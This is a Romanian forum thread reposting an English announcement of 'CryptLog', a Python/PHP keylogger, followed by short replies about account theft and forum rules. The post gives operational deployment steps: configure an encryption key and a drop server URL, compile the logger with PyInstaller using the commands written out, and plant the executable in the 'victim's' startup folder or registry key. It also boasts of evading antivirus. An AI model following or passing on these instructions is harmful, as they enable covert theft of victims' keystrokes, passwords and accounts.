Pagina 1 din 1

Cryptlog - A python keylogger

MesajScris: 27 Dec 2013 20:06
de Americanu
Hello all!
I recently made a simple (Well, not very simple, but I digress) windows only ( :( ) keylogger in python and PHP. Here's the basics of how it works:

1.) captures keys in chunks of 25 keystrokes.
2.) Encrypts the keystrokes with a simple XOR encryption (not very good encryption mind you.)
3.) Sends the encrypted keystrokes off to a server that will record them. The server can deal with multiple clients (keyloggers) running at once, and will still display the keystrokes fine.

EDIT:
It's on github now, so I don't need to worry about updating it here :mrgreen:
CryptLog on Github! [link=http://github.com/3vilp4wn/CryptLog]click[/link]

Here's from the readme:
Here's what you need to do to start logging keystrokes:
1.) Download PyHook ([link=http://sourceforge.net/projects/pyhook/]click[/link]). You only need PyHook to be on the computer you use to build the keylogger.
2.) Edit the "cryptlog.py" file.
a.) replace "thisiswhereyourkeygoes" with whatever key you want to encrypt the data with.
b.) Change "http://www.yoursite.com/droplogs.php" to whatever your site is. (Need a good freehost? PM me.)
3.) Edit the "viewlogs.py" file.
a.) Change "http://www.yoursite.com/" to the name of your site.
4.) Edit the "droplogs.php" file.
a.) Change "keyloggerlogfiles.txt" to the name of the file you want to keep logs in.
5.) Upload "droplogs.php" to your site.
6.) Compile the file(s).
a.) Download "Pyinstaller 2.0" (http://www.pyinstaller.org/)
b.) Run "python pyinstaller.py -F --name=Cryptlog -w path\to\cryptlog.py" where "path\to\cryptlog.py" is the relitive path pointing to cryptlog.py. You *MUST* run this in PyInstaller's directory.
c.) *OPTIONAL* Run "python pyinstaller.py -F --name=Viewlogs path\to\viewlogs.py" where "path\to\viewlogs.py" is the relitive path pointing to viewlogs.py. You *MUST* run this in PyInstaller's directory.
7.) Put "Cryptlog.exe" into the victim's startup folder, or, better yet, into the startup registry key.
8.) Run "Viewlogs.exe" or "viewlogs.py" and type in the name of the logfile that you set in setp 3a. Then, type in the ID of the log that you want to view. Each time Cryptlog.exe starts up, it creates a new log with a new ID. Next, type in what you used as your key in step 1a. From there, you should be able to view the logs of the keystrokes.
9.) *OPTIONAL* Send me an email telling me how much you love/hate CryptLog. My email (or, rather, the Evil Ninja Hackers email) is "ENH@lavabit.com"

Have fun,

3vilp4wn.

If you need help setting it up, just post here or PM me.


Anyways, that's all.
It takes a bit to set up, but once you set it up, you can use the same.exe all the time :)
It's also hard for antivirus to detect, because each .exe is different.

Have fun,
3vilp4wn


îi un keylogger în Python. Simplu și curat.
#NetestatDeMine
#DontShare

Re: Cryptlog - A python keylogger

MesajScris: 27 Dec 2013 21:37
de Tig3rMan
Super dar nu cumva incerci tu sa ne furi conturile de steam, email, etc.

Re: Cryptlog - A python keylogger

MesajScris: 28 Dec 2013 21:10
de Americanu
Nu doearece tu ai doar install de la el
trebuie sa il configurezi cum scrie si mai sus.

El la momentul de fata e inofensiv dupa ce lai configurat cum scrie si in topic o sa ai succes cu el :) eu am luat acest post de pe un site unde am mebru vip .. sincer nu lam incercat

Re: Cryptlog - A python keylogger

MesajScris: 04 Ian 2014 22:54
de MrMateiu
Știi că riști ban nu? Nu ai voie cu Crack/Warez ... altă dată poate citești și tu regulile că de aceea sunt făcute.

Re: Cryptlog - A python keylogger

MesajScris: 04 Ian 2014 23:00
de Eseth
MrMateiu (Re: Post 4), Nu are asta nici o treaba cu Crack/Warez, altfel topicul demult ar fi fost mutat in arhiva, iar autorul ar fi primit warn.
Softul e gratuit si open pentru toti ca si tot ce se posteaza pe github. ;)